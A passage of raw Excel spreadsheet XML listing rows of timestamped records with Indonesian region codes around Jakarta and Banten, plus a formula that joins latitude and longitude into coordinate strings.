      <c r="L3134" t="s">
        <v>2716</v>
      </c>
      <c r="M3134">
        <v>3171020006</v>
      </c>
      <c r="N3134">
        <v>3171020</v>
      </c>
      <c r="O3134">
        <v>3171</v>
      </c>
      <c r="P3134">
        <v>31</v>
      </c>
      <c r="Q3134" t="s">
        <v>499</v>
      </c>
      <c r="R3134" t="s">
        <v>484</v>
      </c>
      <c r="S3134" t="s">
        <v>108</v>
      </c>
      <c r="T3134" t="s">
        <v>33</v>
      </c>
      <c r="U3134" s="5">
        <v>10683936</v>
      </c>
      <c r="V3134" s="5" t="s">
        <v>17270</v>
      </c>
      <c r="W3134" s="5">
        <v>-627839</v>
      </c>
      <c r="X3134" t="s">
        <v>21008</v>
      </c>
      <c r="Y3134" t="str">
        <f t="shared" si="48"/>
        <v>-6.27839,106.83936</v>
      </c>
    </row>
    <row r="3135" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3135">
        <v>257565</v>
      </c>
      <c r="B3135" s="1">
        <v>44246</v>
      </c>
      <c r="C3135" s="2">
        <v>0.75249999999999995</v>
      </c>
      <c r="D3135" t="s">
        <v>22</v>
      </c>
      <c r="E3135" t="s">
        <v>23</v>
      </c>
      <c r="F3135" t="s">
        <v>10541</v>
      </c>
      <c r="G3135" t="s">
        <v>10542</v>
      </c>
      <c r="H3135" t="s">
        <v>26</v>
      </c>
      <c r="I3135" t="s">
        <v>10543</v>
      </c>
      <c r="J3135" t="s">
        <v>10544</v>
      </c>
      <c r="L3135" t="s">
        <v>10545</v>
      </c>
      <c r="M3135">
        <v>3171020005</v>
      </c>
      <c r="N3135">
        <v>3171020</v>
      </c>
      <c r="O3135">
        <v>3171</v>
      </c>
      <c r="P3135">
        <v>31</v>
      </c>
      <c r="Q3135" t="s">
        <v>483</v>
      </c>
      <c r="R3135" t="s">
        <v>484</v>
      </c>
      <c r="S3135" t="s">
        <v>108</v>
      </c>
      <c r="T3135" t="s">
        <v>33</v>
      </c>
      <c r="U3135" s="5">
        <v>10682752</v>
      </c>
      <c r="V3135" s="5" t="s">
        <v>17271</v>
      </c>
      <c r="W3135" s="5">
        <v>-628543</v>
      </c>
      <c r="X3135" t="s">
        <v>21009</v>
      </c>
      <c r="Y3135" t="str">
        <f t="shared" si="48"/>
        <v>-6.28543,106.82752</v>
      </c>
    </row>
    <row r="3136" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3136">
        <v>257566</v>
      </c>
      <c r="B3136" s="1">
        <v>44246</v>
      </c>
      <c r="C3136" s="2">
        <v>0.7527314814814815</v>
      </c>
      <c r="D3136" t="s">
        <v>22</v>
      </c>
      <c r="E3136" t="s">
        <v>23</v>
      </c>
      <c r="F3136" t="s">
        <v>10546</v>
      </c>
      <c r="G3136" t="s">
        <v>10547</v>
      </c>
      <c r="H3136" t="s">
        <v>26</v>
      </c>
      <c r="I3136" t="s">
        <v>945</v>
      </c>
      <c r="J3136" t="s">
        <v>10548</v>
      </c>
      <c r="L3136" t="s">
        <v>10549</v>
      </c>
      <c r="M3136">
        <v>3171070001</v>
      </c>
      <c r="N3136">
        <v>3171070</v>
      </c>
      <c r="O3136">
        <v>3171</v>
      </c>
      <c r="P3136">
        <v>31</v>
      </c>
      <c r="Q3136" t="s">
        <v>120</v>
      </c>
      <c r="R3136" t="s">
        <v>121</v>
      </c>
      <c r="S3136" t="s">
        <v>108</v>
      </c>
      <c r="T3136" t="s">
        <v>33</v>
      </c>
      <c r="U3136" s="5">
        <v>10681273</v>
      </c>
      <c r="V3136" s="5" t="s">
        <v>15465</v>
      </c>
      <c r="W3136" s="5">
        <v>-625944</v>
      </c>
      <c r="X3136" t="s">
        <v>21010</v>
      </c>
      <c r="Y3136" t="str">
        <f t="shared" si="48"/>
        <v>-6.25944,106.81273</v>
      </c>
    </row>
    <row r="3137" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3137">
        <v>257567</v>
      </c>
      <c r="B3137" s="1">
        <v>44246</v>
      </c>
      <c r="C3137" s="2">
        <v>0.75449074074074074</v>
      </c>
      <c r="D3137" t="s">
        <v>22</v>
      </c>
      <c r="E3137" t="s">
        <v>23</v>
      </c>
      <c r="F3137" t="s">
        <v>10550</v>
      </c>
      <c r="G3137" t="s">
        <v>10551</v>
      </c>
      <c r="H3137" t="s">
        <v>26</v>
      </c>
      <c r="I3137" t="s">
        <v>2300</v>
      </c>
      <c r="J3137" t="s">
        <v>4487</v>
      </c>
      <c r="L3137" t="s">
        <v>10552</v>
      </c>
      <c r="M3137">
        <v>3171070001</v>
      </c>
      <c r="N3137">
        <v>3171070</v>
      </c>
      <c r="O3137">
        <v>3171</v>
      </c>
      <c r="P3137">
        <v>31</v>
      </c>
      <c r="Q3137" t="s">
        <v>120</v>
      </c>
      <c r="R3137" t="s">
        <v>121</v>
      </c>
      <c r="S3137" t="s">
        <v>108</v>
      </c>
      <c r="T3137" t="s">
        <v>33</v>
      </c>
      <c r="U3137" s="5">
        <v>10682054</v>
      </c>
      <c r="V3137" s="5" t="s">
        <v>17272</v>
      </c>
      <c r="W3137" s="5">
        <v>-625856</v>
      </c>
      <c r="X3137" t="s">
        <v>21011</v>
      </c>
      <c r="Y3137" t="str">
        <f t="shared" si="48"/>
        <v>-6.25856,106.82054</v>
      </c>
    </row>
    <row r="3138" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3138">
        <v>257588</v>
      </c>
      <c r="B3138" s="1">
        <v>44246</v>
      </c>
      <c r="C3138" s="2">
        <v>0.75807870370370367</v>
      </c>
      <c r="D3138" t="s">
        <v>22</v>
      </c>
      <c r="E3138" t="s">
        <v>23</v>
      </c>
      <c r="F3138" t="s">
        <v>10553</v>
      </c>
      <c r="G3138" t="s">
        <v>10554</v>
      </c>
      <c r="H3138" t="s">
        <v>26</v>
      </c>
      <c r="I3138" t="s">
        <v>722</v>
      </c>
      <c r="J3138" t="s">
        <v>4197</v>
      </c>
      <c r="L3138" t="s">
        <v>10555</v>
      </c>
      <c r="M3138">
        <v>3172020005</v>
      </c>
      <c r="N3138">
        <v>3172020</v>
      </c>
      <c r="O3138">
        <v>3172</v>
      </c>
      <c r="P3138">
        <v>31</v>
      </c>
      <c r="Q3138" t="s">
        <v>3744</v>
      </c>
      <c r="R3138" t="s">
        <v>1644</v>
      </c>
      <c r="S3138" t="s">
        <v>49</v>
      </c>
      <c r="T3138" t="s">
        <v>33</v>
      </c>
      <c r="U3138" s="5">
        <v>10687516</v>
      </c>
      <c r="V3138" s="5" t="s">
        <v>17273</v>
      </c>
      <c r="W3138" s="5">
        <v>-630387</v>
      </c>
      <c r="X3138" t="s">
        <v>21012</v>
      </c>
      <c r="Y3138" t="str">
        <f t="shared" si="48"/>
        <v>-6.30387,106.87516</v>
      </c>
    </row>
    <row r="3139" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3139">
        <v>257589</v>
      </c>
      <c r="B3139" s="1">
        <v>44246</v>
      </c>
      <c r="C3139" s="2">
        <v>0.75868055555555547</v>
      </c>
      <c r="D3139" t="s">
        <v>22</v>
      </c>
      <c r="E3139" t="s">
        <v>23</v>
      </c>
      <c r="F3139" t="s">
        <v>10556</v>
      </c>
      <c r="H3139" t="s">
        <v>26</v>
      </c>
      <c r="I3139" t="s">
        <v>882</v>
      </c>
      <c r="J3139" t="s">
        <v>3135</v>
      </c>
      <c r="M3139">
        <v>3674020020</v>
      </c>
      <c r="N3139">
        <v>3674020</v>
      </c>
      <c r="O3139">
        <v>3674</v>
      </c>
      <c r="P3139">
        <v>36</v>
      </c>
      <c r="Q3139" t="s">
        <v>10557</v>
      </c>
      <c r="R3139" t="s">
        <v>10558</v>
      </c>
      <c r="S3139" t="s">
        <v>170</v>
      </c>
      <c r="T3139" t="s">
        <v>171</v>
      </c>
      <c r="U3139" s="5">
        <v>10668481</v>
      </c>
      <c r="V3139" s="5" t="s">
        <v>17274</v>
      </c>
      <c r="W3139" s="5">
        <v>-628893</v>
      </c>
      <c r="X3139" t="s">
        <v>21013</v>
      </c>
      <c r="Y3139" t="str">
        <f t="shared" ref="Y3139:Y3202" si="49">CONCATENATE(X3139,",",V3139)</f>
        <v>-6.28893,106.68481</v>
      </c>
    </row>
    <row r="3140" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3140">
        <v>257590</v>
      </c>
      <c r="B3140" s="1">
        <v>44246</v>
      </c>
      <c r="C3140" s="2">
        <v>0.76005787037037031</v>
      </c>
      <c r="D3140" t="s">
        <v>22</v>
      </c>
      <c r="E3140" t="s">
        <v>23</v>
      </c>
      <c r="F3140" t="s">
        <v>10559</v>
      </c>
      <c r="G3140" t="s">
        <v>10560</v>
      </c>
      <c r="H3140" t="s">
        <v>26</v>
      </c>
      <c r="I3140" t="s">
        <v>862</v>
      </c>
      <c r="J3140" t="s">
        <v>4487</v>
      </c>
      <c r="L3140" t="s">
        <v>10561</v>
      </c>
      <c r="M3140">
        <v>3171070001</v>
      </c>
      <c r="N3140">
        <v>3171070</v>
      </c>
      <c r="O3140">
        <v>3171</v>
      </c>
      <c r="P3140">
        <v>31</v>
      </c>
      <c r="Q3140" t="s">
        <v>120</v>
      </c>
      <c r="R3140" t="s">
        <v>121</v>
      </c>
      <c r="S3140" t="s">
        <v>108</v>
      </c>
      <c r="T3140" t="s">
        <v>33</v>
      </c>
      <c r="U3140" s="5">
        <v>10682100</v>
      </c>
      <c r="V3140" s="5" t="s">
        <v>17275</v>
      </c>
      <c r="W3140" s="5">
        <v>-625906</v>
      </c>
      <c r="X3140" t="s">
        <v>21014</v>
      </c>
      <c r="Y3140" t="str">
        <f t="shared" si="49"/>
        <v>-6.25906,106.82100</v>
      </c>
    </row>
    <row r="3141" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3141">
        <v>257631</v>
      </c>
      <c r="B3141" s="1">
        <v>44246</v>
      </c>
      <c r="C3141" s="2">
        <v>0.77430555555555547</v>
      </c>
      <c r="D3141" t="s">
        <v>2648</v>
      </c>
      <c r="E3141" t="s">
        <v>23</v>
      </c>
      <c r="G3141" t="s">
        <v>10562</v>
      </c>
      <c r="H3141" t="s">
        <v>26</v>
      </c>
      <c r="J3141" t="s">
        <v>10563</v>
      </c>
      <c r="L3141" t="s">
        <v>2766</v>
      </c>
      <c r="M3141">
        <v>3171050003</v>
      </c>
      <c r="N3141">
        <v>3171050</v>
      </c>
      <c r="O3141">
        <v>3171</v>
      </c>
      <c r="P3141">
        <v>31</v>
      </c>
      <c r="Q3141" t="s">
        <v>10564</v>
      </c>
      <c r="R3141" t="s">
        <v>508</v>
      </c>
      <c r="S3141" t="s">
        <v>108</v>
      </c>
      <c r="T3141" t="s">
        <v>33</v>
      </c>
      <c r="U3141" s="5">
        <v>10678348</v>
      </c>
      <c r="V3141" s="5" t="s">
        <v>17276</v>
      </c>
      <c r="W3141" s="5">
        <v>-624050</v>
      </c>
      <c r="X3141" t="s">
        <v>21015</v>
      </c>
      <c r="Y3141" t="str">
        <f t="shared" si="49"/>
        <v>-6.24050,106.78348</v>
      </c>
    </row>
    <row r="3142" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3142">
        <v>257651</v>
      </c>
      <c r="B3142" s="1">
        <v>44246</v>
      </c>
      <c r="C3142" s="2">
        <v>0.78182870370370372</v>
      </c>
      <c r="D3142" t="s">
        <v>22</v>
      </c>
      <c r="E3142" t="s">
        <v>23</v>
      </c>
      <c r="F3142" t="s">
        <v>10565</v>
      </c>
      <c r="H3142" t="s">
        <v>26</v>
      </c>
      <c r="I3142" t="s">
        <v>197</v>
      </c>
      <c r="J3142" t="s">
        <v>2536</v>
      </c>
      <c r="L3142" t="s">
        <v>10566</v>
      </c>
      <c r="M3142">
        <v>3172040005</v>
      </c>
      <c r="N3142">
        <v>3172040</v>
      </c>
      <c r="O3142">
        <v>3172</v>
      </c>
      <c r="P3142">
        <v>31</v>
      </c>
      <c r="Q3142" t="s">
        <v>1351</v>
      </c>
      <c r="R3142" t="s">
        <v>281</v>
      </c>
      <c r="S3142" t="s">
        <v>49</v>
      </c>
      <c r="T3142" t="s">
        <v>33</v>
      </c>
      <c r="U3142" s="5">
        <v>10690215</v>
      </c>
      <c r="V3142" s="5" t="s">
        <v>17277</v>
      </c>
      <c r="W3142" s="5">
        <v>-624757</v>
      </c>
      <c r="X3142" t="s">
        <v>21016</v>
      </c>
      <c r="Y3142" t="str">
        <f t="shared" si="49"/>
        <v>-6.24757,106.90215</v>
      </c>
    </row>
    <row r="3143" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3143">
        <v>257669</v>
      </c>
      <c r="B3143" s="1">
        <v>44246</v>
      </c>
      <c r="C3143" s="2">
        <v>0.78402777777777777</v>
      </c>
      <c r="D3143" t="s">
        <v>2648</v>
      </c>
      <c r="E3143" t="s">
        <v>23</v>
      </c>
      <c r="G3143" t="s">
        <v>10567</v>
      </c>
      <c r="H3143" t="s">
        <v>26</v>
      </c>
      <c r="I3143" t="s">
        <v>1059</v>
      </c>
      <c r="J3143" t="s">
        <v>5356</v>
      </c>
      <c r="L3143" t="s">
        <v>10568</v>
      </c>
      <c r="M3143">
        <v>3172040002</v>
      </c>
      <c r="N3143">
        <v>3172040</v>
      </c>
      <c r="O3143">
        <v>3172</v>
      </c>
      <c r="P3143">
        <v>31</v>
      </c>
      <c r="Q3143" t="s">
        <v>281</v>
      </c>
      <c r="R3143" t="s">
        <v>281</v>
      </c>
      <c r="S3143" t="s">
        <v>49</v>
      </c>
      <c r="T3143" t="s">
        <v>33</v>
      </c>
      <c r="U3143" s="5">
        <v>10687994</v>
      </c>
      <c r="V3143" s="5" t="s">
        <v>15414</v>
      </c>
      <c r="W3143" s="5">
        <v>-628312</v>
      </c>
      <c r="X3143" t="s">
        <v>21017</v>
      </c>
      <c r="Y3143" t="str">
        <f t="shared" si="49"/>
        <v>-6.28312,106.87994</v>
      </c>
    </row>
    <row r="3144" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3144">
        <v>257684</v>
      </c>
      <c r="B3144" s="1">
        <v>44246</v>
      </c>
      <c r="C3144" s="2">
        <v>0.79054398148148142</v>
      </c>
      <c r="D3144" t="s">
        <v>22</v>
      </c>
      <c r="E3144" t="s">
        <v>23</v>
      </c>
      <c r="F3144" t="s">
        <v>10569</v>
      </c>
      <c r="G3144" t="s">
        <v>10570</v>
      </c>
      <c r="H3144" t="s">
        <v>26</v>
      </c>
      <c r="I3144" t="s">
        <v>2002</v>
      </c>
      <c r="J3144" t="s">
        <v>6966</v>
      </c>
      <c r="L3144" t="s">
        <v>10571</v>
      </c>
      <c r="M3144">
        <v>3171030005</v>
      </c>
      <c r="N3144">
        <v>3171030</v>
      </c>
      <c r="O3144">
        <v>3171</v>
      </c>
      <c r="P3144">
        <v>31</v>
      </c>
      <c r="Q3144" t="s">
        <v>5900</v>
      </c>
      <c r="R3144" t="s">
        <v>364</v>
      </c>
      <c r="S3144" t="s">
        <v>108</v>
      </c>
      <c r="T3144" t="s">
        <v>33</v>
      </c>
      <c r="U3144" s="5">
        <v>10680313</v>
      </c>
      <c r="V3144" s="5" t="s">
        <v>17278</v>
      </c>
      <c r="W3144" s="5">
        <v>-627480</v>
      </c>
      <c r="X3144" t="s">
        <v>21018</v>
      </c>
      <c r="Y3144" t="str">
        <f t="shared" si="49"/>
        <v>-6.27480,106.80313</v>
      </c>
    </row>
    <row r="3145" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3145">
        <v>257686</v>
      </c>
      <c r="B3145" s="1">
        <v>44246</v>
      </c>
      <c r="C3145" s="2">
        <v>0.7895833333333333</v>
      </c>
      <c r="D3145" t="s">
        <v>2648</v>
      </c>
      <c r="E3145" t="s">
        <v>23</v>
      </c>
      <c r="G3145" t="s">
        <v>10572</v>
      </c>
      <c r="H3145" t="s">
        <v>26</v>
      </c>
      <c r="J3145" t="s">
        <v>2580</v>
      </c>
      <c r="L3145" t="s">
        <v>10573</v>
      </c>
      <c r="M3145">
        <v>3172040005</v>
      </c>
      <c r="N3145">
        <v>3172040</v>
      </c>
      <c r="O3145">
        <v>3172</v>
      </c>
      <c r="P3145">
        <v>31</v>
      </c>
      <c r="Q3145" t="s">
        <v>1351</v>
      </c>
      <c r="R3145" t="s">
        <v>281</v>
      </c>
      <c r="S3145" t="s">
        <v>49</v>
      </c>
      <c r="T3145" t="s">
        <v>33</v>
      </c>
      <c r="U3145" s="5">
        <v>10689382</v>
      </c>
      <c r="V3145" s="5" t="s">
        <v>15208</v>
      </c>
      <c r="W3145" s="5">
        <v>-624115</v>
      </c>
      <c r="X3145" t="s">
        <v>21019</v>
      </c>
      <c r="Y3145" t="str">
        <f t="shared" si="49"/>
        <v>-6.24115,106.89382</v>
      </c>
    </row>
    <row r="3146" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3146">
        <v>257697</v>
      </c>
      <c r="B3146" s="1">
        <v>44246</v>
      </c>
      <c r="C3146" s="2">
        <v>0.7934606481481481</v>
      </c>
      <c r="D3146" t="s">
        <v>22</v>
      </c>
      <c r="E3146" t="s">
        <v>23</v>
      </c>
      <c r="F3146" t="s">
        <v>10574</v>
      </c>
      <c r="G3146" t="s">
        <v>10575</v>
      </c>
      <c r="H3146" t="s">
        <v>26</v>
      </c>
      <c r="I3146" t="s">
        <v>3029</v>
      </c>
      <c r="J3146" t="s">
        <v>10576</v>
      </c>
      <c r="L3146" t="s">
        <v>10577</v>
      </c>
      <c r="M3146">
        <v>3171060001</v>
      </c>
      <c r="N3146">
        <v>3171060</v>
      </c>
      <c r="O3146">
        <v>3171</v>
      </c>
      <c r="P3146">
        <v>31</v>
      </c>
      <c r="Q3146" t="s">
        <v>2211</v>
      </c>
      <c r="R3146" t="s">
        <v>1236</v>
      </c>
      <c r="S3146" t="s">
        <v>108</v>
      </c>
      <c r="T3146" t="s">
        <v>33</v>
      </c>
      <c r="U3146" s="5">
        <v>10679301</v>
      </c>
      <c r="V3146" s="5" t="s">
        <v>17279</v>
      </c>
      <c r="W3146" s="5">
        <v>-625555</v>
      </c>
      <c r="X3146" t="s">
        <v>21020</v>
      </c>
      <c r="Y3146" t="str">
        <f t="shared" si="49"/>
        <v>-6.25555,106.79301</v>
      </c>
    </row>
    <row r="3147" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3147">
        <v>257734</v>
      </c>
      <c r="B3147" s="1">
        <v>44246</v>
      </c>
      <c r="C3147" s="2">
        <v>0.80469907407407415</v>
      </c>
      <c r="D3147" t="s">
        <v>22</v>
      </c>
      <c r="E3147" t="s">
        <v>23</v>
      </c>
      <c r="F3147" t="s">
        <v>10578</v>
      </c>
      <c r="H3147" t="s">
        <v>26</v>
      </c>
      <c r="I3147" t="s">
        <v>1099</v>
      </c>
      <c r="J3147" t="s">
        <v>3135</v>
      </c>
      <c r="L3147" t="s">
        <v>10579</v>
      </c>
      <c r="M3147">
        <v>3674060002</v>
      </c>
      <c r="N3147">
        <v>3674060</v>
      </c>
      <c r="O3147">
        <v>3674</v>
      </c>
      <c r="P3147">
        <v>36</v>
      </c>
      <c r="Q3147" t="s">
        <v>190</v>
      </c>
      <c r="R3147" t="s">
        <v>169</v>
      </c>
      <c r="S3147" t="s">
        <v>170</v>
      </c>
      <c r="T3147" t="s">
        <v>171</v>
      </c>
      <c r="U3147" s="5">
        <v>10668525</v>
      </c>
      <c r="V3147" s="5" t="s">
        <v>17280</v>
      </c>
      <c r="W3147" s="5">
        <v>-625684</v>
      </c>
      <c r="X3147" t="s">
        <v>21021</v>
      </c>
      <c r="Y3147" t="str">
        <f t="shared" si="49"/>
        <v>-6.25684,106.68525</v>
      </c>
    </row>
    <row r="3148" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3148">
        <v>257759</v>
      </c>
      <c r="B3148" s="1">
        <v>44246</v>
      </c>
      <c r="C3148" s="2">
        <v>0.81354166666666661</v>
      </c>
      <c r="D3148" t="s">
        <v>22</v>
      </c>
      <c r="E3148" t="s">
        <v>23</v>
      </c>
      <c r="F3148" t="s">
        <v>10580</v>
      </c>
      <c r="G3148" t="s">
        <v>10581</v>
      </c>
      <c r="H3148" t="s">
        <v>26</v>
      </c>
      <c r="I3148" t="s">
        <v>2165</v>
      </c>
      <c r="J3148" t="s">
        <v>2627</v>
      </c>
      <c r="L3148" t="s">
        <v>10582</v>
      </c>
      <c r="M3148">
        <v>3275010011</v>
      </c>
      <c r="N3148">
        <v>3275010</v>
      </c>
      <c r="O3148">
        <v>3275</v>
      </c>
      <c r="P3148">
        <v>32</v>
      </c>
      <c r="Q3148" t="s">
        <v>2389</v>
      </c>
      <c r="R3148" t="s">
        <v>287</v>
      </c>
      <c r="S3148" t="s">
        <v>41</v>
      </c>
      <c r="T3148" t="s">
        <v>42</v>
      </c>
      <c r="U3148" s="5">
        <v>10692174</v>
      </c>
      <c r="V3148" s="5" t="s">
        <v>17281</v>
      </c>
      <c r="W3148" s="5">
        <v>-626229</v>
      </c>
      <c r="X3148" t="s">
        <v>20834</v>
      </c>
      <c r="Y3148" t="str">
        <f t="shared" si="49"/>
        <v>-6.26229,106.92174</v>
      </c>
    </row>
    <row r="3149" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3149">
        <v>257808</v>
      </c>
      <c r="B3149" s="1">
        <v>44246</v>
      </c>
      <c r="C3149" s="2">
        <v>0.82627314814814812</v>
      </c>
      <c r="D3149" t="s">
        <v>22</v>
      </c>
      <c r="E3149" t="s">
        <v>23</v>
      </c>
      <c r="F3149" t="s">
        <v>10583</v>
      </c>
      <c r="G3149" t="s">
        <v>10584</v>
      </c>
      <c r="H3149" t="s">
        <v>26</v>
      </c>
      <c r="I3149" t="s">
        <v>27</v>
      </c>
      <c r="J3149" t="s">
        <v>3135</v>
      </c>
      <c r="L3149" t="s">
        <v>10585</v>
      </c>
      <c r="M3149">
        <v>3671010003</v>
      </c>
      <c r="N3149">
        <v>3671010</v>
      </c>
      <c r="O3149">
        <v>3671</v>
      </c>
      <c r="P3149">
        <v>36</v>
      </c>
      <c r="Q3149" t="s">
        <v>400</v>
      </c>
      <c r="R3149" t="s">
        <v>200</v>
      </c>
      <c r="S3149" t="s">
        <v>201</v>
      </c>
      <c r="T3149" t="s">
        <v>171</v>
      </c>
      <c r="U3149" s="5">
        <v>10670900</v>
      </c>
      <c r="V3149" s="5" t="s">
        <v>17282</v>
      </c>
      <c r="W3149" s="5">
        <v>-624871</v>
      </c>
      <c r="X3149" t="s">
        <v>18559</v>
      </c>
      <c r="Y3149" t="str">
        <f t="shared" si="49"/>
        <v>-6.24871,106.70900</v>
      </c>
    </row>
    <row r="3150" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3150">
        <v>257858</v>
      </c>
      <c r="B3150" s="1">
        <v>44246</v>
      </c>
      <c r="C3150" s="2">
        <v>0.84155092592592595</v>
      </c>
      <c r="D3150" t="s">
        <v>22</v>
      </c>
      <c r="E3150" t="s">
        <v>23</v>
      </c>
      <c r="F3150" t="s">
        <v>10586</v>
      </c>
      <c r="H3150" t="s">
        <v>26</v>
      </c>
      <c r="I3150" t="s">
        <v>2005</v>
      </c>
      <c r="J3150" t="s">
        <v>4429</v>
      </c>
      <c r="L3150" t="s">
        <v>2794</v>
      </c>
      <c r="M3150">
        <v>3171070002</v>
      </c>
      <c r="N3150">
        <v>3171070</v>
      </c>
      <c r="O3150">
        <v>3171</v>
      </c>
      <c r="P3150">
        <v>31</v>
      </c>
      <c r="Q3150" t="s">
        <v>2142</v>
      </c>
      <c r="R3150" t="s">
        <v>121</v>
      </c>
      <c r="S3150" t="s">
        <v>108</v>
      </c>
      <c r="T3150" t="s">
        <v>33</v>
      </c>
      <c r="U3150" s="5">
        <v>10682115</v>
      </c>
      <c r="V3150" s="5" t="s">
        <v>15704</v>
      </c>
      <c r="W3150" s="5">
        <v>-624061</v>
      </c>
      <c r="X3150" t="s">
        <v>21022</v>
      </c>
      <c r="Y3150" t="str">
        <f t="shared" si="49"/>
        <v>-6.24061,106.82115</v>
      </c>
    </row>
    <row r="3151" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3151">
        <v>257871</v>
      </c>
      <c r="B3151" s="1">
        <v>44246</v>
      </c>
      <c r="C3151" s="2">
        <v>0.84236111111111101</v>
      </c>
      <c r="D3151" t="s">
        <v>22</v>
      </c>
      <c r="E3151" t="s">
        <v>23</v>
      </c>
      <c r="F3151" t="s">
        <v>10587</v>
      </c>
      <c r="H3151" t="s">
        <v>26</v>
      </c>
      <c r="I3151" t="s">
        <v>2293</v>
      </c>
      <c r="J3151" t="s">
        <v>5616</v>
      </c>
      <c r="L3151" t="s">
        <v>2794</v>
      </c>
      <c r="M3151">
        <v>3171070002</v>
      </c>
      <c r="N3151">
        <v>3171070</v>
      </c>
      <c r="O3151">
        <v>3171</v>
      </c>
      <c r="P3151">
        <v>31</v>
      </c>
      <c r="Q3151" t="s">
        <v>2142</v>
      </c>
      <c r="R3151" t="s">
        <v>121</v>
      </c>
      <c r="S3151" t="s">
        <v>108</v>
      </c>
      <c r="T3151" t="s">
        <v>33</v>
      </c>
      <c r="U3151" s="5">
        <v>10682064</v>
      </c>
      <c r="V3151" s="5" t="s">
        <v>17283</v>
      </c>
      <c r="W3151" s="5">
        <v>-624918</v>
      </c>
      <c r="X3151" t="s">
        <v>21023</v>
      </c>
      <c r="Y3151" t="str">
        <f t="shared" si="49"/>
        <v>-6.24918,106.82064</v>
      </c>
    </row>
    <row r="3152" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3152">
        <v>257872</v>
      </c>
      <c r="B3152" s="1">
        <v>44246</v>
      </c>
      <c r="C3152" s="2">
        <v>0.84332175925925934</v>
      </c>
      <c r="D3152" t="s">
        <v>22</v>
      </c>
      <c r="E3152" t="s">
        <v>23</v>
      </c>
      <c r="F3152" t="s">
        <v>10588</v>
      </c>
      <c r="H3152" t="s">
        <v>26</v>
      </c>
      <c r="I3152" t="s">
        <v>1389</v>
      </c>
      <c r="J3152" t="s">
        <v>5616</v>
      </c>
      <c r="L3152" t="s">
        <v>2794</v>
      </c>
      <c r="M3152">
        <v>3171070002</v>
      </c>
      <c r="N3152">
        <v>3171070</v>
      </c>
      <c r="O3152">
        <v>3171</v>
      </c>
      <c r="P3152">
        <v>31</v>
      </c>
      <c r="Q3152" t="s">
        <v>2142</v>
      </c>
      <c r="R3152" t="s">
        <v>121</v>
      </c>
      <c r="S3152" t="s">
        <v>108</v>
      </c>
      <c r="T3152" t="s">
        <v>33</v>
      </c>
      <c r="U3152" s="5">
        <v>10681570</v>
      </c>
      <c r="V3152" s="5" t="s">
        <v>17284</v>
      </c>
      <c r="W3152" s="5">
        <v>-624938</v>
      </c>
      <c r="X3152" t="s">
        <v>21024</v>
      </c>
      <c r="Y3152" t="str">
        <f t="shared" si="49"/>
        <v>-6.24938,106.81570</v>
      </c>
    </row>
    <row r="3153" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3153">
        <v>257873</v>
      </c>
      <c r="B3153" s="1">
        <v>44246</v>
      </c>
      <c r="C3153" s="2">
        <v>0.84385416666666668</v>
      </c>
      <c r="D3153" t="s">
        <v>22</v>
      </c>
      <c r="E3153" t="s">
        <v>23</v>
      </c>
      <c r="F3153" t="s">
        <v>10589</v>
      </c>
      <c r="H3153" t="s">
        <v>26</v>
      </c>
      <c r="I3153" t="s">
        <v>5089</v>
      </c>
      <c r="J3153" t="s">
        <v>10590</v>
      </c>
      <c r="L3153" t="s">
        <v>10591</v>
      </c>
      <c r="M3153">
        <v>3171100001</v>
      </c>
      <c r="N3153">
        <v>3171100</v>
      </c>
      <c r="O3153">
        <v>3171</v>
      </c>
      <c r="P3153">
        <v>31</v>
      </c>
      <c r="Q3153" t="s">
        <v>1474</v>
      </c>
      <c r="R3153" t="s">
        <v>107</v>
      </c>
      <c r="S3153" t="s">
        <v>108</v>
      </c>
      <c r="T3153" t="s">
        <v>33</v>
      </c>
      <c r="U3153" s="5">
        <v>10681887</v>
      </c>
      <c r="V3153" s="5" t="s">
        <v>17285</v>
      </c>
      <c r="W3153" s="5">
        <v>-622546</v>
      </c>
      <c r="X3153" t="s">
        <v>21025</v>
      </c>
      <c r="Y3153" t="str">
        <f t="shared" si="49"/>
        <v>-6.22546,106.81887</v>
      </c>
    </row>
    <row r="3154" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3154">
        <v>257874</v>
      </c>
      <c r="B3154" s="1">
        <v>44246</v>
      </c>
      <c r="C3154" s="2">
        <v>0.84384259259259264</v>
      </c>
      <c r="D3154" t="s">
        <v>22</v>
      </c>
      <c r="E3154" t="s">
        <v>23</v>
      </c>
      <c r="F3154" t="s">
        <v>10592</v>
      </c>
      <c r="H3154" t="s">
        <v>26</v>
      </c>
      <c r="I3154" t="s">
        <v>2962</v>
      </c>
      <c r="J3154" t="s">
        <v>5616</v>
      </c>
      <c r="L3154" t="s">
        <v>2794</v>
      </c>
      <c r="M3154">
        <v>3171070002</v>
      </c>
      <c r="N3154">
        <v>3171070</v>
      </c>
      <c r="O3154">
        <v>3171</v>
      </c>
      <c r="P3154">
        <v>31</v>
      </c>
      <c r="Q3154" t="s">
        <v>2142</v>
      </c>
      <c r="R3154" t="s">
        <v>121</v>
      </c>
      <c r="S3154" t="s">
        <v>108</v>
      </c>
      <c r="T3154" t="s">
        <v>33</v>
      </c>
      <c r="U3154" s="5">
        <v>10681631</v>
      </c>
      <c r="V3154" s="5" t="s">
        <v>17286</v>
      </c>
      <c r="W3154" s="5">
        <v>-624934</v>
      </c>
      <c r="X3154" t="s">
        <v>21026</v>
      </c>
      <c r="Y3154" t="str">
        <f t="shared" si="49"/>
        <v>-6.24934,106.81631</v>
      </c>
    </row>
    <row r="3155" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3155">
        <v>257875</v>
      </c>
